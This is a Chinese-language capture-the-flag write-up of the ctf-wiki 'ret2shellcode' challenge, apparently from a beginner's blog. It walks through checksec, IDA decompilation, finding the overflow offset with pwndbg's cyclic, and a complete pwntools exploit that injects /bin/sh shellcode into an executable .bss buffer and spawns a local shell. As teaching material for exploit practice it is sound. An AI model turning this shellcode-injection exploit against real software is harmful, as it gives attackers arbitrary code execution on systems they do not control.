ctfwiki-pwn-ret2shellcode

題目來自ctfwiki，一個很好的ctf入門網站（本人也是萌新，但願與各位大神一塊兒成長），題目連接https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/

1.首先使用checksec工具查看一下架構

root@moli-virtual-machine:~/文檔# checksec ret2shellcode
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2shellcode'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

2.使用32位IDA打開，F5查看一下源代碼

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(&s);
  strncpy(buf2, &s, 0x64u);
  printf("bye bye ~");
  return 0;
}

能夠看到使用了strncpy將s中的內容複製到了buf2中，雙擊buf2，buf2在.bss段中

.bss:0804A080 ; char buf2[100]
.bss:0804A080 buf2            db 64h dup(?)           ; DATA XREF: main+7B↑o
.bss:0804A080 _bss            ends
.bss:0804A080

3.使用pwntools工具簡單調試一下，使用vmmap工具看看該bss段是否有執行權限。

wndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 0x8048000  0x8049000 r-xp     1000 0      /root/文檔/ret2shellcode
 0x8049000  0x804a000 r-xp     1000 0      /root/文檔/ret2shellcode
 0x804a000  0x804b000 rwxp     1000 1000   /root/文檔/ret2shellcode
0xf7ddc000 0xf7fb1000 r-xp   1d5000 0      /lib/i386-linux-gnu/libc-2.27.so
0xf7fb1000 0xf7fb2000 ---p     1000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb2000 0xf7fb4000 r-xp     2000 1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb4000 0xf7fb5000 rwxp     1000 1d7000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fb5000 0xf7fb8000 rwxp     3000 0      
0xf7fd0000 0xf7fd2000 rwxp     2000 0      
0xf7fd2000 0xf7fd5000 r--p     3000 0      [vvar]
0xf7fd5000 0xf7fd6000 r-xp     1000 0      [vdso]
0xf7fd5000 0xf7ffe000 rwxp    29000 0      <explored>
0xf7fd6000 0xf7ffc000 r-xp    26000 0      /lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 r-xp     1000 25000  /lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 rwxp     1000 26000  /lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 rwxp    21000 0      [stack]
pwndbg>

經過上面第三條能夠看出，這個.bss段是具備可執行權限的。

那麼此次咱們就控制程序執行 shellcode，也就是讀入 shellcode，而後控制程序執行 bss 段處的 shellcode。

4.查看彙編代碼，能夠看到程序是使用esp進行操做的，這時候偏移量就要經過gdb來尋找了

.text:08048593                 call    _gets
.text:08048598                 mov     dword ptr [esp+8], 64h ; n
.text:080485A0                 lea     eax, [esp+80h+s]
.text:080485A4                 mov     [esp+4], eax    ; src
.text:080485A8                 mov     dword ptr [esp], offset buf2 ; dest
.text:080485AF                 call    _strncpy
.text:080485B4                 mov     dword ptr [esp], offset format ; "bye bye ~"
.text:080485BB                 call    _printf
.text:080485C0                 mov     eax, 0
.text:080485C5                 leave
.text:080485C6                 retn
.text:080485C6 ; } // starts at 804852D

咱們讓程序在gets函數這停下來

pwndbg> b * 0x08048593
Breakpoint 1 at 0x8048593: file ret2shellcode.c, line 14.

而後使用cyclic函數直接生成隨機數

pwndbg> cyclic 400
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad

ni，將生成的隨機數填入

pwndbg> ni
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
    
    
EBP  0xffffd0c8 ◂— 0x62616163 ('caab')

能夠看到，ebp的位置出現了更換，使用cyclic -l算出偏移量

pwndbg> cyclic -l caab
108

因爲程序是32位，算上一個ebp的保存值，偏移一共是108+4位

5.編寫shellcode

這裏僅使用集成好的就能夠了from pwntools

（1）先設置目標機的參數

context(os='linux',arch='i386',log_level='debug')

• os設置系統爲linux系統，在完成ctf題目時大多數的系統都是linux系統
• arch設置架構爲i386，能夠簡單的認爲64位的時候位amd64，32 位的時候是i386
• log_level設置日誌輸出的等級爲debug，這句話在調試的時候通常都會設置，這樣pwntools會將完整的io過程都打印下來，使得調試更加方便。

（2）獲取shellcode

1）得到執行system（"/bin/sh"）彙編代碼所對應的機器碼

asm(shellcraft.sh())

具體利用過程以下

from pwn import*
context(log_level = 'debug', arch = 'i386', os = 'linux')
shellcode=asm(shellcraft.sh())

6.咱們這裏只是打本地,就不用設置目標機的參數了

exp以下

from pwn import *
  
io = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())
buf2_addr = 0x0804A080

io.sendline(shellcode.ljust(112,'A')+p32(buf2_addr))

io.interactive()

執行以後的結果

[+] Starting local process './ret2shellcode': pid 3172
[*] Switching to interactive mode
No system for you this time !!!
bye bye ~$